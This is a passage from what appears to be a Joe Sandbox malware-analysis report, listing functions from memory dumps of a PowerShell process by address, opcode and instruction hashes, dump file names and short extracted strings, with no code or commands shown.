Opcode Fuzzy Hash: ff9bd8e476c490e7622fbab9e048e434bb0f020d9ef6d25cd2274795bb3ccd63
Instruction Fuzzy Hash: CF71AF30A002498FDB15EF68C884A9DFBF2FF89314F188969D456DB761DB71AC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7BD6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7b8f6f293dc590d0616344c7317af351ec487aa138e56054c7a500c6800893
Instruction ID: 47c313a8f989ada9e52e848515ea97be6ea6efb421a53029d87748a2f4e99b95
Opcode Fuzzy Hash: 6b7b8f6f293dc590d0616344c7317af351ec487aa138e56054c7a500c6800893
Instruction Fuzzy Hash: 25712930E002489FEF14EFA4D454BADBBF2BF88304F148569D416AB7A0DB75AD46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 08188810 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1926097441.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb2f3501efdf66fe472b6687ffe0cfab4a4eabd29fa707c61e03a34cacfb475
Instruction ID: 102376e929f2de18b02fb3c30880a4a7ffcbab32507649a6d0c0beebcdba3a3f
Opcode Fuzzy Hash: aeb2f3501efdf66fe472b6687ffe0cfab4a4eabd29fa707c61e03a34cacfb475
Instruction Fuzzy Hash: 91512970E00609CFCB15DF98C8959AEBBB2FF88314B648668D955AB3A4D335EC51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 072A1048 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d51404c4d44a0e6ec81fc957629854895952cfc741c7e9a5176d39a442e802a
Instruction ID: a25de5305537aa1f5d15e971385c7808a2e66fd42ecc9bdb4519f34bf826c3a2
Opcode Fuzzy Hash: 5d51404c4d44a0e6ec81fc957629854895952cfc741c7e9a5176d39a442e802a
Instruction Fuzzy Hash: 604109B1B10129ABCB149EB989406AEBBF6EFC4320F24843AD815DB351DE32DD55C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE77F9 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 830ceaa6fb2000c781584ebc4b4d59b85b41b2d1fe64601e1599e6f47a431263
Instruction ID: 4d0f500b9da8e9e0cc24632b565a25718ead286ad425fd6de0870fd855640a35
Opcode Fuzzy Hash: 830ceaa6fb2000c781584ebc4b4d59b85b41b2d1fe64601e1599e6f47a431263
Instruction Fuzzy Hash: 55416F31A442448FEB15EF74C954BAEBBF2EF89355F184468E406EB3A0CB349D41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 081877B7 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1926097441.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5597c84ca85d3f8ef871576c1eade017fc4fb58e1036adfd44f0de8386c350b3
Instruction ID: bf9b6b73b0330f747bfaa6383373cfa8cf7b11d4cce7121a7bf20621fe76c3f3
Opcode Fuzzy Hash: 5597c84ca85d3f8ef871576c1eade017fc4fb58e1036adfd44f0de8386c350b3
Instruction Fuzzy Hash: DB41F770E00509DFCB05DF9CD4859AEBBB2FF88320B248A59E515AB3A4D735AC51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DEB0EF Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 874b51271fe5d9525e1ef6585dfc39ffe7862b55c729619a1c5e5c402eae0ce8
Instruction ID: c96a1ede0ec1fa506242633f4df28fc0073c958b152ece169be77a476bd6a3eb
Opcode Fuzzy Hash: 874b51271fe5d9525e1ef6585dfc39ffe7862b55c729619a1c5e5c402eae0ce8
Instruction Fuzzy Hash: AF51C534A00209EFDB05DFA8D584A9DFBB2FF88314F248559E405AB365C772ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7A53 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ed5a391bfcfc588c1e79c280150fec6461718b904d679aa7a7a394e29751a33
Instruction ID: 01b290a5d9a7c9d703c71cca1d42dadda2189671ee269ba74376ec3b0492b472
Opcode Fuzzy Hash: 3ed5a391bfcfc588c1e79c280150fec6461718b904d679aa7a7a394e29751a33
Instruction Fuzzy Hash: 52417E70E002488FEB14EFA9C444BADFBF2BF89344F148569D006AB3A4DB70AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 081871F1 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1926097441.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba87486b97d19f6767a3fee68a1e200cd17cf0e722028c9d5a0f2cdb220171c6
Instruction ID: 13cf51803f663a2c657ac2c893011a5a49dccb6cdda117f306673768dedbc06d
Opcode Fuzzy Hash: ba87486b97d19f6767a3fee68a1e200cd17cf0e722028c9d5a0f2cdb220171c6
Instruction Fuzzy Hash: 34410874E00505DFCB09CF9CC9849ADBBB2BF49310B248659E814EB3A5D335AC91CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 08188190 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1926097441.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4530bfe26f43c4b020a535db7d8cd027adf38d0088784c2bcd852c0a2a6e929
Instruction ID: a4135f05bb2fd017b61b2054eba12b067dd0b631bfccf98ac943660e4b65f42c
Opcode Fuzzy Hash: a4530bfe26f43c4b020a535db7d8cd027adf38d0088784c2bcd852c0a2a6e929
Instruction Fuzzy Hash: 4F412774A00509DFCB04DF9CC995AAEB7B2FF48311B248668E815AB3A5D735EC41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DE2BB0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59cafa4abe2b8d51bca7a9c092f6d45687b836427da2ee801539befb920e031a
Instruction ID: 035cf5d55191ec5373ba1667b89b1043692d427de39c0073c46e3a5906e590e4
Opcode Fuzzy Hash: 59cafa4abe2b8d51bca7a9c092f6d45687b836427da2ee801539befb920e031a
Instruction Fuzzy Hash: FC4107B4A006098FCB05DF59C598AAABBB5FF48314B158199D906AB364C736FC50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DEADA2 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018d2b3f599eeaef20f4e76fef23e0a431ac90cc575c2fad2683e201e415a03d
Instruction ID: d7c880f70956eb4c2578017832bed75b9c31082ed751636d10ce6f712f2a71ba
Opcode Fuzzy Hash: 018d2b3f599eeaef20f4e76fef23e0a431ac90cc575c2fad2683e201e415a03d
Instruction Fuzzy Hash: 7D31D671A046458FCB06DF58C4C09AEFBB1FF49320B158699D496DB3A1C735ED42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072A13E8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7b22c31842b8e77333c3ed15a4bcb4f63881883d7d54e13a3db90f77c6dea6
Instruction ID: 2753ebb8f7a6f7fdb6bd89f17468c58449c39ffed88b825307a35f0b1fa77e24
Opcode Fuzzy Hash: 7d7b22c31842b8e77333c3ed15a4bcb4f63881883d7d54e13a3db90f77c6dea6
Instruction Fuzzy Hash: 50216BB172031B77DB2459BE9900B37A7E6ABC4721F24C82AA549CF385ED76D891C360

Uniqueness

Uniqueness Score: -1.00%

Function 02DEC5C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71697426e6a1575b8962531a8507ef173d1c9da96ab172c06017167f1ee9fc94
Instruction ID: 749030b5f902cc1ab2b45dbfa41f5d894bbbd5069c4b69647d27f5bdb6270ba1
Opcode Fuzzy Hash: 71697426e6a1575b8962531a8507ef173d1c9da96ab172c06017167f1ee9fc94
Instruction Fuzzy Hash: DA311D31A012189FCF25EB64C8556EEB7B2BF89309F1044EAD50AAB351CB35DE95CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02DEADD8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8853c4ec80701fec6c951308aa6557656803729c1b92c9fc349910a433c32a8d
Instruction ID: 0382951058fa9fec2e0b113df479af7d2afb239688cc0100f25db38ac5dd6ec6
Opcode Fuzzy Hash: 8853c4ec80701fec6c951308aa6557656803729c1b92c9fc349910a433c32a8d
Instruction Fuzzy Hash: 1B315A74A006069FCB15DF5CC9809AAFBF1FF48310B258699D45AEB765C331EC81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 072A13CB Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b4bd6b3d76b616167e764dc750bdf01fe71a2b5cd336c76e4a4b691bb8e598
Instruction ID: 1e3bfd2b9f6ac158200ca98151fcbd00ab9ffaa90a07d550e533b63391514803
Opcode Fuzzy Hash: 86b4bd6b3d76b616167e764dc750bdf01fe71a2b5cd336c76e4a4b691bb8e598
Instruction Fuzzy Hash: 4C219DB171439B7BD7251A7A88007B27FE29F86720F188467E544CF3C6E9759494C371

Uniqueness

Uniqueness Score: -1.00%

Function 072A1036 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc7f50598a675b0a1ef8ade05cd5afc53fa063457255ed12600ef24c3b9bb4d8
Instruction ID: 3c1310c49bf36656f57579afba33b7ff0a4d93dd709fdf1d841f6cb3d195d0a4
Opcode Fuzzy Hash: cc7f50598a675b0a1ef8ade05cd5afc53fa063457255ed12600ef24c3b9bb4d8
Instruction Fuzzy Hash: D02104B1E1025EAFCB149F7989401AABBF5EF49320F288466DC19EB240D7319D50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 072A6289 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28148f7453ebe077143c0c5cdfbb27a13b40e0efa8d9a22b07c838f1854804b
Instruction ID: 887b4f50629549380ef2a126fc144b205a63dfaec90713fb26bbc53ed4a4e219
Opcode Fuzzy Hash: e28148f7453ebe077143c0c5cdfbb27a13b40e0efa8d9a22b07c838f1854804b
Instruction Fuzzy Hash: 311159B2B10116ABCB209669ED017AEFB52DBC5324F14C83ADA16CB791DB729816C390

Uniqueness

Uniqueness Score: -1.00%

Function 072A0AF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e0e5fbb32f156acd55f10b9571173037908fd7bf11620502eccbb9c2ce0006
Instruction ID: 566f38453f6a313d443524f1db76b51ec0ec81f6663d8fbd0aa894c7715b89f9
Opcode Fuzzy Hash: 31e0e5fbb32f156acd55f10b9571173037908fd7bf11620502eccbb9c2ce0006
Instruction Fuzzy Hash: D31108B1720306BBCB348D44C690B767796EBC4318F58C855E9188F3A1E772EC45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 072A11D8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d3e44f0a9f98d3e102037c26d15dda47cb1843ad1912cc5600b615ad3848a6
Instruction ID: 9e4a44f2cb4bb044918c63b2c2d87686d1f000ca914d42ff2978c4254488ca21
Opcode Fuzzy Hash: 34d3e44f0a9f98d3e102037c26d15dda47cb1843ad1912cc5600b615ad3848a6
Instruction Fuzzy Hash: CF01F77632022BEBC72455AAE40057AB7A99BC6333F14C43FD555CB650D672C866C760

Uniqueness

Uniqueness Score: -1.00%

Function 02DEB1FC Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1920000829.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7986ced041f9959873d2c839398c8840f3806a551998b8a03428fb315c4e509c
Instruction ID: b66c4bd487f1a73fe616b1846ddf0e714d78ec69b049dc947898a7063a1d6065
Opcode Fuzzy Hash: 7986ced041f9959873d2c839398c8840f3806a551998b8a03428fb315c4e509c
Instruction Fuzzy Hash: D711A735A04209EFDF05DFA8D884A9DFBB2BF48324F298559E405AB365C771ED85CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02C7D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1919701423.0000000002C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ec8cbbf58569a9f05ab09bb5149a31abfa0079590035b945b5afea89697ddd
Instruction ID: 489d685b3cfccac34a44a772fa2083fbb9be1487147b806e88ced3a7b9ca0db6
Opcode Fuzzy Hash: 40ec8cbbf58569a9f05ab09bb5149a31abfa0079590035b945b5afea89697ddd
Instruction Fuzzy Hash: 5301D6714093409AEB108E2ACDC4B67BF98EF81334F1CC56AED4A4B246C779D981CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 02C7D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1919701423.0000000002C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df14ae1ba3469442d1d2a2c7a06cb17edf2ccae5ff83327804e91e8a7c2ea2e
Instruction ID: d2407045b47bf6b72418d4736897deba765513f8f2b6faf3e2bc6bc8a2967b32
Opcode Fuzzy Hash: 9df14ae1ba3469442d1d2a2c7a06cb17edf2ccae5ff83327804e91e8a7c2ea2e
Instruction Fuzzy Hash: 78F0C272004340AEEB108E16C884B62FFA8EF81334F18C45AED480E286C3799880CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 08186A31 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1926097441.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9ecfb16422567a847187644521a7f9b25be8257bab8c5e1baba3f686cb15b5
Instruction ID: 25c716bb5168f6370624aecfc52a5b643232734e8a6adf94fbdee9ce6d3a2d35
Opcode Fuzzy Hash: 1e9ecfb16422567a847187644521a7f9b25be8257bab8c5e1baba3f686cb15b5
Instruction Fuzzy Hash: 32F0B430E04245DFCB11EB69E984DAEBB74FF81350F1082A9D455D7692D7346816CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02C7DAC0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1919701423.0000000002C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57728ea849316aa705baf195443250266fa57ade99edd6ea862bb8961288c8ac
Instruction ID: 174233ad10d705a3876fc362285a40d8934871934a9ea3cb7a3f4839e4adff72
Opcode Fuzzy Hash: 57728ea849316aa705baf195443250266fa57ade99edd6ea862bb8961288c8ac
Instruction Fuzzy Hash: B821E4B1544244DFD704DF18D684B2ABBA9FFC4724F24C56AD90B4B251C379D446C662

Uniqueness

Uniqueness Score: -1.00%

Function 072AB920 Relevance: 19.2, Strings: 15, Instructions: 496COMMON

Download Yara Rule

Strings

tP^q, xrefs: 072AB9FB
$^q, xrefs: 072ABD5E
4'^q, xrefs: 072ABDD7
4'^q, xrefs: 072ABDE3
$^q, xrefs: 072ABB46
$^q, xrefs: 072ABBAB
tP^q, xrefs: 072AB9EF
4'^q, xrefs: 072ABBCC
$^q, xrefs: 072ABDA9
$^q, xrefs: 072ABDB9
4'^q, xrefs: 072AB9A5
4'^q, xrefs: 072AB999
$^q, xrefs: 072ABECE
4'^q, xrefs: 072ABBD8
$^q, xrefs: 072ABB9B

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2338339476
Opcode ID: 50222de1bd6c1ef2362ebabfe1f5963a81a155d855bda54f5b8c2b14669b5e5d
Instruction ID: 67313325aafb581358f80fa02a90e744e12f07b2e4fc29dd8d3723b494b50490
Opcode Fuzzy Hash: 50222de1bd6c1ef2362ebabfe1f5963a81a155d855bda54f5b8c2b14669b5e5d
Instruction Fuzzy Hash: 76F119F1B2430BEFCB258F68D44466ABBE2EF85311F14C8AAD8458F255DB31D885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 072A80B0 Relevance: 10.2, Strings: 8, Instructions: 192COMMON

Download Yara Rule

Strings

$^q, xrefs: 072A80C4
$^q, xrefs: 072A8242
yl, xrefs: 072A8285
tP^q, xrefs: 072A8160
$^q, xrefs: 072A824E
tP^q, xrefs: 072A8154
$^q, xrefs: 072A8217
yl, xrefs: 072A8293

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$yl$yl
API String ID: 0-4015994844
Opcode ID: 264fa92acdacfb02353b4a569644ff5fc7adbfe88aa5a146d2b441fd7deb2601
Instruction ID: db2e7d4b7392490f4df2f056ac2c1efb4d3bb46ab39e1b4076fc3cc42df9bb26
Opcode Fuzzy Hash: 264fa92acdacfb02353b4a569644ff5fc7adbfe88aa5a146d2b441fd7deb2601
Instruction Fuzzy Hash: A4517BB1B24347BFDB265A699C04B77BBE6AFC2310F18C46BE5458F291DA71C844C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 072AC6BE Relevance: 9.2, Strings: 7, Instructions: 419COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072ACA12
-tk, xrefs: 072ACD21
tLuk, xrefs: 072AC7D3
4'^q, xrefs: 072ACAB6
4'^q, xrefs: 072AC9FC
x.tk, xrefs: 072ACCD3
4'^q, xrefs: 072ACAA0

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tLuk$x.tk$-tk
API String ID: 0-3284895458
Opcode ID: c4e581d1b0d5e78d17cc392330aa8a82e51e2b62a77aafdc843dbf3d16085f64
Instruction ID: 12cd6b81076b7d6e63796d6213a3c1d9660870ab92987dce52f09b8c43db6b81
Opcode Fuzzy Hash: c4e581d1b0d5e78d17cc392330aa8a82e51e2b62a77aafdc843dbf3d16085f64
Instruction Fuzzy Hash: CD1241B4A10218DFCB24DB68CA51BDEBBB2FF84304F108899D5096B755CB36AD85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 072AFAAD Relevance: 7.7, Strings: 6, Instructions: 194COMMON

Download Yara Rule

Strings

XRcq, xrefs: 072AFC1D
XRcq, xrefs: 072AFC2D
tP^q, xrefs: 072AFB98
XRcq, xrefs: 072AFAE9
$^q, xrefs: 072AFB05
tP^q, xrefs: 072AFB8C

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
API String ID: 0-1682816917
Opcode ID: 7c55f9e862bf82d5a6c7ea46d95d2547db0a277e02dce2fa90d0190d3ea0521a
Instruction ID: 9681d6ac53f773130a4f812fe6ec1aa9e95be72baa24b30ae157a8c3b95c8959
Opcode Fuzzy Hash: 7c55f9e862bf82d5a6c7ea46d95d2547db0a277e02dce2fa90d0190d3ea0521a
Instruction Fuzzy Hash: 82612A7172020AAFCB24DF69865066AFBF3AF89310F24C869E8059F355CB79CC46C791

Uniqueness

Uniqueness Score: -1.00%

Function 072AB350 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$^q, xrefs: 072AB387
$^q, xrefs: 072AB3A3
$^q, xrefs: 072AB3E7
$^q, xrefs: 072AB3F3
$^q, xrefs: 072AB3D7
$^q, xrefs: 072AB3CB

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: b425a68cdf097331f0afbe72467e1752f622dfcfe09ea4687abb1e7bc24de159
Instruction ID: 33e2417d9cd3099821103438c566a7b19a382c98d14b926fe4c46d5752ab46e1
Opcode Fuzzy Hash: b425a68cdf097331f0afbe72467e1752f622dfcfe09ea4687abb1e7bc24de159
Instruction Fuzzy Hash: C23145F2F34347EFCB2949A59460176B7A1BBC6311B1888BFC4428F645CE72C849C352

Uniqueness

Uniqueness Score: -1.00%

Function 072AF13E Relevance: 6.5, Strings: 5, Instructions: 217COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072AF328
tP^q, xrefs: 072AF24D
4'^q, xrefs: 072AF334
tP^q, xrefs: 072AF259
$^q, xrefs: 072AF19B

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q
API String ID: 0-2369969929
Opcode ID: 5efd2c632e2c477beee31b1e87e0d268ce3e66a26718601c9299203916e2ddf5
Instruction ID: a0492e106a02926d1bec0b0b7eb44106b930c80b62e762459a80eee8a63206cf
Opcode Fuzzy Hash: 5efd2c632e2c477beee31b1e87e0d268ce3e66a26718601c9299203916e2ddf5
Instruction Fuzzy Hash: 05715AB1B2025BAFCB148F64CA446ABBBE2BF85310F148869E8415F395CB35DC95C791

Uniqueness

Uniqueness Score: -1.00%

Function 072A0470 Relevance: 6.4, Strings: 5, Instructions: 152COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072A056A
4'^q, xrefs: 072A055E
$^q, xrefs: 072A04FC
$^q, xrefs: 072A0541
$^q, xrefs: 072A0535

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: ec9acff4932efa8f7dc8cf3c72d44769b298fd6037f0c955f6186be64e70aba1
Instruction ID: 55caa968f4e2c7afe477c3ec377d84cb43d8617ee6632cf3cb571e3293b2117a
Opcode Fuzzy Hash: ec9acff4932efa8f7dc8cf3c72d44769b298fd6037f0c955f6186be64e70aba1
Instruction Fuzzy Hash: 664126B1B24346AFCF365A7499106BB7FA2AFC2310F14446AD905CB391EA32D945C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 072A2D48 Relevance: 6.4, Strings: 5, Instructions: 131COMMON

Download Yara Rule

Strings

$^q, xrefs: 072A2D7F
$^q, xrefs: 072A2DD8
$^q, xrefs: 072A2DE4
4'^q, xrefs: 072A2E42
4'^q, xrefs: 072A2E36

Memory Dump Source

Source File: 00000001.00000002.1924347485.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: cf087679bd756ca92dcb25a90c2294aee615424f1808bca4409fa7bab83df56b
Instruction ID: f0c914815673a9bcb15fd159167d0dacd8c4a2c1f80f844b428a1aade70f31b9
Opcode Fuzzy Hash: cf087679bd756ca92dcb25a90c2294aee615424f1808bca4409fa7bab83df56b
Instruction Fuzzy Hash: 94417AB2A3024BFFCB294E798504566B7E1BFD2311F28856FC8118F295DB31C485C751

Uniqueness

